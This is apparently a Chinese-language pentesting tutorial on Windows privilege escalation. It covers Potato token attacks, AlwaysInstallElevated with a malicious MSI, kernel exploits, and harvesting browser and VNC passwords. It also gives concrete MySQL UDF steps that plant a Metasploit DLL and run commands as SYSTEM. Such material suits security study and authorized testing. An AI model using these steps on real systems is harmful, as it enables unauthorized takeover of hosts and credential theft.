Windows提权方式汇总

windows 提权

一、土豆（potato）家族提权

原理

土豆提权就是通过 windows 的 COM（Component Object Model，组件对象模型）类。向指定的服务器端口发送 NTLM 认证，捕获认证数据包，并修改数据包内容使其认证成功，从而获得 system 权限的 token。在通过高权限的令牌执行反弹 shell 的命令，获取高权限用户的 shell。

实现条件

1. 获取到高权限的 token
2. 当前账户拥有 SeImpersonatePrivilege 或 SeAssignPrimaryTokenPrivilege 权限

当用户具有 SeImpersonatePrivilege 特权，可以调用 CreateProcessWithTokenW 以某个 Token 的权限启动新进程。(最常见的，一般 IIS 服务的用户都具有该类权限)

当用户具有 SeAssignPrimaryTokenPrivilege 特权，可以调用 CreateProcessAsUserW 以指定用户权限启动新进程。(这个权限一般管理员才具有)

1）juicypotato（多汁土豆）

github 里有详细的讲解： https://github.com/ohpe/juicy-potato

满足以上提权的条件，直接用工具进行提权。

juicypotato 可以在本地监听端口，进行提权。

2）RoguePotato（烂土豆）

微软修补后，高版本 Windows DCOM 解析器不允许 OBJREF 中的 DUALSTRINGARRAY 字段指定端口号（也就是不能像 juicypotato 一样在本地端口直接监听 NTLM 认证的流量包了）。

但是，总有大佬会绕过这样的限制：为了绕过这个限制并能做本地令牌协商，作者在一台远程主机上的 135 端口做流量转发，将其转回受害者本机端口，并写了一个恶意 RPC OXID 解析器。

github 介绍： https://github.com/antonioCoco/RoguePotato/tree/master

出发 NTLM 认证机制后，把流量包转到了 kali 主机的 135 端口上，再有 kali 主机上转给 windows 主机的 9999 端口，从而实现了 对 DCOM 解析器不允许 OBJREF 中的 DUALSTRINGARRAY 字段指定端口号 的绕过，原理与 juicypotato 基本一致。

二、系统错误配置提权-AlwaysInstallElevated

这是一个最经典的 windows 提权，但是实际场景中确是很少见的。简单说一下原理。

这是由于 window 的注册表的配置错误导致的提权，AlwaysInstallElevated 选项置为 1 后，windows 在执行 msi 下在文件时，会用高权限用户去安装。此时，我们的 msi 文件里的内容不是正常的下载程序，而是反弹 shell 的语句，不就完成提权了吗

实现的话可以去 msf 中生成一个恶意的 msi 文件，下载到 windows 上执行，进行提权。

三、内核提权

这是最简单的一种提权方式，站在巨人的肩膀上，利用大佬发现的操作系统内核的漏洞进行提权。

最经典的永恒之蓝（ms-17-010）漏洞，就是操作系统内核漏洞，只要攻击成功就是最高的 system 权限。

这里分享一个帮助发现系统提权漏洞的工具

WinPeas： https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

他可以枚举出一些可以尝试的攻击方式，但是也不能全信，还是要根据我们对目标具体收集到的信息，进行判断。

注意：内核提权很容易导致目标系统崩溃，想使用一定是经过授权的，或者是在自己的靶机环境中

四、密码收集提权

通过发现电脑用户的一些账号密码

1）浏览器密码

浏览器密码一般在： %APPDATA%\Mozilla\Firefox\Profiles\xxx.default\ 文件夹下

Version 大于等于 32.0，保存记录的文件为 logins.json

Version 大于等于 3.5，小于 32.0，保存记录的文件为 signons.sqlite

可以使用工具

WebBrowserPassView：

链接：https://pan.baidu.com/s/1jTumsrJSRLRIIdG49fHLlA?pwd = gbsz

提取码：gbsz

2）注册表密码

reg query HKEY_CURRENT_USER\Software\TightVNC\Server

用 vncpwd 工具进行解密：https://aluigi.altervista.org/pwdrec/vncpwd.zip

五、数据库提权

1）mysql UDF 提权

UDF 提权原理

UDF 指的是用户自定义函数，用户可以对数据库所使用的函数进行一个扩展（利用 dll 文件），从而定制一些符合自己需求的函数，但是同样的，当黑客获取了数据库的 root 用户的一个权限时，即使所在的系统权限很低，也可以使用 UDF 来自定义一个执行系统命令的函数，但是执行权限为管理员权限，从而可以用来添加管理员账户，远程连接。

提权条件

1. 必须是 root 权限（主要是得创建和抛弃自定义函数）
2. secure_file_priv =
3. 将 udf.dll 文件上传到 MySQL 的 plugin 目录下（这里以 MySQL = 5.5.29 为例）

查看 secure_file_priv 的值（他必须是空白值，只要有内容就不能进行 UDF 提权）

show global variables like "secure%";

查看 mysql 绝对路径

SHOW VARIABLES LIKE "%plugin%";

创建文件夹( 你要提权系统的 mysql 的绝对路径 )

select 'xxx' into dumpfile
'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib::$INDEX_ALLOCATION';

select 'xxx' into dumpfile
'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin::$INDEX_ALLOCATI
ON';

虽然语句会出现报错，但是文件夹会成功创建。

利用 msf 的 exploit/multi/mysql/mysql_udf_payload 生成一个 dll 的 payload，上传到\lib\plugin 目录下

SELECT 生成的payload内容 into dumpfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.5.29\\lib\\plugin\\udf.dll';

定义别名

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

select sys_eval('whoami');

看到输出为system用户